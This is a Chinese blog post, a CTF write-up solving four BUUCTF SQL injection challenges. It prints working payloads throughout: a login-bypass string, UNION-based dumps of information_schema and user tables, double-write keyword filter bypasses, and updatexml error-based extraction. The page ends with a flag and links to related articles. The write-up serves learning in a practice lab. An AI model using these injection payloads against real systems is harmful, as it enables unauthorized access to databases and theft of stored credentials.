BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL

最新推荐文章于 2024-02-27 21:12:06 发布
最新推荐文章于 2024-02-27 21:12:06 发布
阅读量2.5k 收藏 10
点赞数 3
分类专栏: CTF SQL注入 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48799157/article/details/123750627
版权

小白一个,记录一下解题过程,如有错误请指正!

一、EasySQL

1.这里我们使用一句话万能密码就可以了,记得加上#

1' or '1'='1'#

2.登录就可以拿到flag

 

二、LoveSQL

        网页里说用sqlmap是没有灵魂滴,但是还是手痒试了一下,发现什么都扫不出来,可能是我太菜了能力还没到家,希望有大佬能指点一下~

1.我们只能运用灵魂了,用万能句尝试一下,发现登录进来了,但是没有flag

 2.猜测flag应该是放在某个字段里了,我们用联合注入(union)看一下列数

1' union select 1,2,3#

登录成功,列数再加1,发现报错了,说明列数有三列,第二第三列有回显

1' union select 1,2,3,4#

 3.开始爆数据库

1' union select 1,2,database()#

4.数据库名为geek,爆表名

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#

 5.很显然l0ve1ysq1是我们想要的表,谁让他和题目长得很像呢~,爆字段

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

 6.flag应该在username或者password里了,用concat_ws函数连起来全部看一下。

1' union select 1,2,group_concat(concat_ws('~',username,password)) from geek.l0ve1ysq1#

 太长了看不完,直接看网页源代码即可

三、BabySQL

1.还是先用万能句试一下,发现不行了,应该是设置了关键字过滤,用burp看一下过滤了那些关键字

 

or,and,union,select,where等都被过滤了,试了一下改大小写,双写,发现双写注入是可以的

1' oorr '1'='1'#

 2.那我们就是用双写注入,查一下列数,发现还是只有三列

1' ununionion selselectect 1,2,3#

3.爆数据库

1' ununionion selselectect 1,2,database()#

 

4.熟悉的数据库名,开始爆表名 

1' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#

5.爆字段

1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#

 

6.查看username,password两个字段

1' ununionion selselectect 1,2,group_concat(concat_ws('~',username,passwoorrd)) frfromom geek.b4bsql#

 

 7.查看网页源代码就可以看到完整的flag了

 四、HardSQL

1.在这一题发现万能句,双写都不能用了,总是出现这样一个页面

2.应该还是把某些关键字过滤掉了,用burp再fuzz一下,发现空格,union,*,=都被过滤了,但是updatexml和extractvalue没被过滤,可以考虑使用报错注入

3.因为空格和*号都被过滤掉了,就不能使用/**/绕过空格了,不过可以使用()绕过,爆数据库

1'or(updatexml(1,concat('~',(select(database()))),1))#

 4.又是熟悉的数据库名,开始爆表名

1'or(updatexml(1,concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('%geek%'))),1))#

5.爆字段

1'or(updatexml(1,concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('%H4rDsq1%'))),1))#

6.查看username,password ,不过根据经验应该是在password里是没错了

1'or(updatexml(1,concat('~',(select(group_concat(concat_ws('~',username,password)))from(geek.H4rDsq1))),1))#

7.没显示完全,因为updatexml函数只能显示前32位,但是mid,substr函数也被过滤掉了,那可以使用right函数

1'or(updatexml(1,concat('~',(select(right(concat_ws('~',username,password),30))from(geek.H4rDsq1))),1))#

8.拼起来就是flag啦

flag{651cd7be-7e7e-4463-9bee-9b451fc0039d} 

参考文章:

https://cloud.tencent.com/developer/article/1740429
https://www.cnblogs.com/Mr-small/p/13473910.html

https://www.cnblogs.com/sipc-love/p/14266070.html

 

 

 

weixin_48799157
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-7-1sqlmap解决ctfhub的sql部分注入题型
qq_45290991的博客
07-01 255
一、cookie注入 二、UA注入 这个真的很难,sqlmap跑了好久……一直测不出来,,不知道为什么,参数也没错啊…… 三、refer注入 https://www.cnblogs.com/0yst3r-2046/p/12493132.html 可以参考这个,,最后一个类型是真的不想跑了 很卡…… ...
SQLmap压缩包,SQLmap压缩包
06-07
SQLmap压缩包
BUUCTF靶场练习——第二周
weixin_47063945的博客
07-22 537
整理了buuctf靶场第七第八道web题目的做题笔记并整理了涉及到的部分知识和扩展
[极客挑战 2019]LoveSQL1 题目分析与详解
最新发布
2302_79800344的博客
02-27 686
一、题目简介。
[极客挑战 2019]EasySQL
qq_52431855的博客
05-31 243
首先尝试注入发现是字符型注入。并且后台两个双引号闭合的 "" 然后尝试万能密码 1' or '1'='1 成功登录
[BUUCTF]-N1BOOK-[第一章 web入门]SQL注入-1 及sqlmap的简单使用
yzl_007的博客
08-28 1381
[第一章 web入门]SQL注入-1 及sqlmap的简单使用 跟着题目来学习一下sqlmap的简单使用 首先?id=1是如下结果 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ked8spa3-1630160772569)(https://i.loli.net/2021/08/28/Oemn9syKg1lEcxS.png)] id=1’ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HsULWnzZ-1630160772571)(https
buuctf-web-[极客挑战 2019]EasySQL
weixin_43345082的博客
06-17 840
sqlmap一把梭 直接用 payload
极客挑战 2019EasySQL
Knsec
05-13 8474
[极客挑战 2019] EasySQL 判断是数字还是字符型注入 正常查询的回显 输入字符型判断一下,发现报错了,看报错显示 ‘1’‘’,输入的是1’,这里查询语句中应该是存在一个单引号的,所以这里报错了,多了一个单引号,说明这里存在字符型的注入,先用万能钥匙测测 使用万能钥匙一测,第一次 正常回显错误,然后又用字符型的测了一下,发现这里的报错中带有 一部分的查询语句 # 万能公式 1 and 1=1 1' and '1'='1 1 or 1=1 1' or '1'='1
ISCTF新生赛 Web easy_sql题解(sqlmap的基操)
Landasika的博客
10-27 1421
先观察题目的提示,(由于是新生赛,所以提示比较明显)显然是需要我们用SQLMAP进行操作。 不妨输入 用户名 1 密码 1' or '1'='1 来进行简单的测试,果然登陆上了。但是返回的是“登陆成功”并没有返回数据库中的内容,于是也可以尝试尝试sql盲注的思路。 一、sqlmap解法 sqlmap的基本命令:Kali Linux 漏洞利用工具集 sqlmap 教程 - 付杰博客 某大神的sqlmap学习笔记:Kali Linux学习笔记SQLMAP 自动注入_江河湖...
极客挑战2019-EasySQL
qq_53689523的博客
02-06 667
根据题目判断,是一个sql注入题目,而且应该是绕过登录的用户名和密码就可以正常登录。1.题目提示是一个sql注入题目,登录查看。GET传参,所以我们猜测其后端代码大概为。然后发现直接绕过成功了,无语。1.判断是否存在注入点。2.Brup抓包分析。
[极客挑战 2019]HardSQL 1
F1or_的博客
08-03 472
一开始直接尝试弱密码发现不行 输入admin’报错 admin’'证明双引号闭合于是构造union注入发现不行,被过滤了,双写绕不过,开始尝试报错注入 先看一下那些被过滤了 空格被过滤直接用()来进行代替 爆库 'or(extractvalue(1,concat(0x7e,(select(database())))))or' 由于#被过滤,这里用or’来进行闭合 爆出数据库geek。 接下来payload 'or(extractvalue(1,concat(0x7e,(select(table_name
BEAWebLogicWorkshop使用笔记之三--Web应用篇
03-03
什么是PageFlowPageFlow是一个基于Struts1.1的web应用编程模型,替代了早期Portal产品中的webflow,不再属于Portal专有,用以实现web应用中用户界面、业务逻辑、导航控制的分离,并且大大简化了WEB应用的开发过程,...
java笔记 Java-Web笔记 J2EE三大框架笔记
10-19
java笔记 Java-Web笔记 J2EE三大框架笔记
C#Web应用程序入门经典学习笔记之二
01-20
读取Web.config中设置 Conn = new SqlConnection(ConfigurationSettings.AppSettings[“cnFriends.ConnectString”]); <appSettings> <!– User application and configured property settings go ...
web服务器三大组件servlet、Filter、Listener——浅浅笔记
06-20
web服务器三大组件servlet、Filter、Listene——浅浅笔记
WEB】[极客挑战2019]EasySQL WP
Miscedence__的博客
04-15 290
0X0000000000000001 审题 其实由题目可以知道这是道SQL注入,然后看到登录,首先尝试万能密码: admin’ or ‘1’='1 如名字所说,这是一道很ez的SQL注入 通过这道题,我们来延伸一下其他东西 0X0000000000000002 关于万能密码 为什么在注入的时候输入万能密码就可以进入呢,对于所有万能密码,都是”万能“的吗? 那么首先,让我们清楚 SQL注入-万能密码的注入原理 0_用户进行用户名和密码验证时,网站需要查询数据库,查询数据库就是执行SQL语句 //
[极客挑战 2019]EasySQL1
whale_waves的博客
10-10 113
尝试sql注入万能密码1'or1=1#学得多了以后可以自己去理解。
BUUCTF Basic 解题记录--BUU SQL COURSE 1
weixin_43171033的博客
09-14 1383
BUUCTF Basic 解题记录--BUU SQL COURSE 1
BUUCTF学习笔记-随便注
weixin_42271850的博客
03-08 2841
BUUCTF学习笔记-随便注 时间:2020/03/05 考点:堆叠注入、SQL预编译语句。          打开发现是一个输入查询框,右键查看代码发现里面又一个提示sqlmap是没有灵魂的。估计这一题是SQL注入,但提示应该不能直接用sqlmap,但还是先去尝试一下。  &nbsp...
[极客挑战 2019]BuyFlag
07-29
根据引用\[1\],题目要求买flag,需要满足两个条件:首先,必须是来自CUIT的学生;其次,需要输入正确的密码。根据引用\[2\]的描述,有人尝试了一些方法,发现需要在cookie中设置一个USER变量为1来表示是CUIT的学生,但是密码还是不正确。经过仔细观察,发现需要使用POST提交方式,并且还需要提交money参数。然而,由于money参数过长,导致了strcmp函数的问题。strcmp函数在PHP5.3之前存在漏洞,当数据类型不匹配时会返回0,即与比较成功的结果一样。因此,只要传入非字符串类型的数据,比如数组,就可以绕过密码验证。这个漏洞可以通过查看参考资料\[4\]中的文章了解更多细节。另外,引用\[3\]提到了is_numeric函数的一些特性,对于空字符%00,无论是放在前面还是后面,都会判断为非数值;而空格字符%20只能放在数值后面才会被判断。这些信息可能对解题有所帮助。 综上所述,题目要求满足CUIT学生身份和正确的密码才能购买flag。通过设置cookie中的USER变量为1来表示CUIT学生身份,然后使用POST提交方式,并传入非字符串类型的数据来绕过密码验证。此外,还需要注意is_numeric函数对空字符和空格字符的判断规则。 #### 引用[.reference_title] - *1* [[极客挑战 2019]BuyFlag](https://blog.csdn.net/m_de_g/article/details/127720694)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [CTF学习笔记——[极客挑战 2019]BuyFlag](https://blog.csdn.net/Obs_cure/article/details/113820888)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值